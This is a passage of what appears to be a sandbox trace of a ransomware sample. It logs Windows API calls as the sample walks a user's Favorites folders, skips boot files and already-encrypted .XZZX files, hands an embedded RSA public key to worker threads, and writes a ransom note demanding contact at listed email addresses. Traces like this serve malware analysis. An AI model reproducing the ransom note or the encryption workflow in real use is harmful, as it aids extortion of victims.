MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0180.193] lstrcpyW (in: lpString1=0x17be7c, lpString2="15DC3754190A8EA84ED7A99B1D2272F0.XZZX" | out: lpString1="15DC3754190A8EA84ED7A99B1D2272F0.XZZX") returned="15DC3754190A8EA84ED7A99B1D2272F0.XZZX" [0180.193] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0180.193] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb40 [0180.193] Sleep (dwMilliseconds=0x96) [0180.341] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0180.341] lstrcmpW (lpString1="8E5ECE9444DBAF1A59BC413E48F39362.XZZX", lpString2="..") returned 1 [0180.341] lstrcmpW (lpString1="8E5ECE9444DBAF1A59BC413E48F39362.XZZX", lpString2=".") returned 1 [0180.341] StrStrW (lpFirst="8E5ECE9444DBAF1A59BC413E48F39362.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0180.341] StrStrW (lpFirst="8E5ECE9444DBAF1A59BC413E48F39362.XZZX", lpSrch="ntldr") returned 0x0 [0180.341] StrStrW (lpFirst="8E5ECE9444DBAF1A59BC413E48F39362.XZZX", lpSrch="NTLDR") returned 0x0 [0180.342] StrStrW (lpFirst="8E5ECE9444DBAF1A59BC413E48F39362.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0180.342] StrStrW (lpFirst="8E5ECE9444DBAF1A59BC413E48F39362.XZZX", lpSrch="ntdetect.com") returned 0x0 [0180.342] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned 50 [0180.342] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") [0180.342] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0180.342] lstrcpyW (in: lpString1=0x17be7c, lpString2="8E5ECE9444DBAF1A59BC413E48F39362.XZZX" | out: lpString1="8E5ECE9444DBAF1A59BC413E48F39362.XZZX") returned="8E5ECE9444DBAF1A59BC413E48F39362.XZZX" [0180.342] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0180.342] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb44 [0180.343] Sleep (dwMilliseconds=0x96) [0180.497] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0180.497] lstrcmpW (lpString1="B8440918056E9F026EA48C8C0986834A.XZZX", lpString2="..") returned 1 [0180.497] lstrcmpW (lpString1="B8440918056E9F026EA48C8C0986834A.XZZX", lpString2=".") returned 1 [0180.497] StrStrW (lpFirst="B8440918056E9F026EA48C8C0986834A.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0180.497] StrStrW (lpFirst="B8440918056E9F026EA48C8C0986834A.XZZX", lpSrch="ntldr") returned 0x0 [0180.498] StrStrW (lpFirst="B8440918056E9F026EA48C8C0986834A.XZZX", lpSrch="NTLDR") returned 0x0 [0180.498] StrStrW (lpFirst="B8440918056E9F026EA48C8C0986834A.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0180.498] StrStrW (lpFirst="B8440918056E9F026EA48C8C0986834A.XZZX", lpSrch="ntdetect.com") returned 0x0 [0180.498] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned 50 [0180.498] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") [0180.498] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0180.498] lstrcpyW (in: lpString1=0x17be7c, lpString2="B8440918056E9F026EA48C8C0986834A.XZZX" | out: lpString1="B8440918056E9F026EA48C8C0986834A.XZZX") returned="B8440918056E9F026EA48C8C0986834A.XZZX" [0180.498] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0180.498] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb48 [0180.501] Sleep (dwMilliseconds=0x96) [0180.654] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0180.654] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0180.654] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0180.654] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0180.654] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0180.654] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0180.655] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0180.655] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" [0180.655] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*" [0180.655] SetErrorMode (uMode=0x1) returned 0x1 [0180.655] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\_HELP_INSTRUCTION.TXT") returned 67 [0180.655] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0180.655] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0180.655] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0xb4c) returned 0x0 [0180.656] RegQueryValueExW (in: hKey=0xb4c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x437d558, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x437d558*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0180.656] RegCloseKey (hKey=0xb4c) returned 0x0 [0180.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0180.656] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0180.656] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb4c [0180.657] CloseHandle (hObject=0xb4c) returned 1 [0180.657] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0180.657] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned="Links" [0180.657] lstrcpyW (in: lpString1=0x17b644, lpString2="Links" | out: lpString1="Links") returned="Links" [0180.657] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0180.657] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.657] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0180.657] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.657] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0180.657] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0180.657] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0180.658] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0180.658] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0180.658] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0180.658] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0180.658] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0180.658] lstrcmpW (lpString1="Microsoft Websites", lpString2="..") returned 1 [0180.658] lstrcmpW (lpString1="Microsoft Websites", lpString2=".") returned 1 [0180.658] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0180.658] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0180.658] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="Microsoft Websites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" [0180.658] SetErrorMode (uMode=0x1) returned 0x1 [0180.658] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" [0180.658] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0180.658] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0180.658] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*" [0180.658] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0180.659] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="Microsoft Websites" [0180.659] lstrcpyW (in: lpString1=0x17b644, lpString2="Microsoft Websites" | out: lpString1="Microsoft Websites") returned="Microsoft Websites" [0180.659] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0180.659] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0180.659] lstrcmpW (lpString1="1844FE2A092A01627C9EB5E50D41E5AA.XZZX", lpString2="..") returned 1 [0180.659] lstrcmpW (lpString1="1844FE2A092A01627C9EB5E50D41E5AA.XZZX", lpString2=".") returned 1 [0180.659] StrStrW (lpFirst="1844FE2A092A01627C9EB5E50D41E5AA.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0180.659] StrStrW (lpFirst="1844FE2A092A01627C9EB5E50D41E5AA.XZZX", lpSrch="ntldr") returned 0x0 [0180.659] StrStrW (lpFirst="1844FE2A092A01627C9EB5E50D41E5AA.XZZX", lpSrch="NTLDR") returned 0x0 [0180.659] StrStrW (lpFirst="1844FE2A092A01627C9EB5E50D41E5AA.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0180.659] StrStrW (lpFirst="1844FE2A092A01627C9EB5E50D41E5AA.XZZX", lpSrch="ntdetect.com") returned 0x0 [0180.659] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 63 [0180.659] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") [0180.660] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0180.660] lstrcpyW (in: lpString1=0x17be7c, lpString2="1844FE2A092A01627C9EB5E50D41E5AA.XZZX" | out: lpString1="1844FE2A092A01627C9EB5E50D41E5AA.XZZX") returned="1844FE2A092A01627C9EB5E50D41E5AA.XZZX" [0180.660] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0180.660] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb54 [0180.660] Sleep (dwMilliseconds=0x96) [0180.809] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0180.809] lstrcmpW (lpString1="1B49B9E018F35807975DC8201D0B3C4F.XZZX", lpString2="..") returned 1 [0180.809] lstrcmpW (lpString1="1B49B9E018F35807975DC8201D0B3C4F.XZZX", lpString2=".") returned 1 [0180.809] StrStrW (lpFirst="1B49B9E018F35807975DC8201D0B3C4F.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0180.809] StrStrW (lpFirst="1B49B9E018F35807975DC8201D0B3C4F.XZZX", lpSrch="ntldr") returned 0x0 [0180.809] StrStrW (lpFirst="1B49B9E018F35807975DC8201D0B3C4F.XZZX", lpSrch="NTLDR") returned 0x0 [0180.810] StrStrW (lpFirst="1B49B9E018F35807975DC8201D0B3C4F.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0180.810] StrStrW (lpFirst="1B49B9E018F35807975DC8201D0B3C4F.XZZX", lpSrch="ntdetect.com") returned 0x0 [0180.810] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 63 [0180.810] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") [0180.810] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0180.810] lstrcpyW (in: lpString1=0x17be7c, lpString2="1B49B9E018F35807975DC8201D0B3C4F.XZZX" | out: lpString1="1B49B9E018F35807975DC8201D0B3C4F.XZZX") returned="1B49B9E018F35807975DC8201D0B3C4F.XZZX" [0180.810] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0180.810] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb58 [0180.810] Sleep (dwMilliseconds=0x96) [0180.966] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0180.966] lstrcmpW (lpString1="30FEF3B4011ABE0E503ED66C0532A256.XZZX", lpString2="..") returned 1 [0180.966] lstrcmpW (lpString1="30FEF3B4011ABE0E503ED66C0532A256.XZZX", lpString2=".") returned 1 [0180.966] StrStrW (lpFirst="30FEF3B4011ABE0E503ED66C0532A256.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0180.966] StrStrW (lpFirst="30FEF3B4011ABE0E503ED66C0532A256.XZZX", lpSrch="ntldr") returned 0x0 [0180.966] StrStrW (lpFirst="30FEF3B4011ABE0E503ED66C0532A256.XZZX", lpSrch="NTLDR") returned 0x0 [0180.966] StrStrW (lpFirst="30FEF3B4011ABE0E503ED66C0532A256.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0180.966] StrStrW (lpFirst="30FEF3B4011ABE0E503ED66C0532A256.XZZX", lpSrch="ntdetect.com") returned 0x0 [0180.966] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 63 [0180.966] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") [0180.966] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC 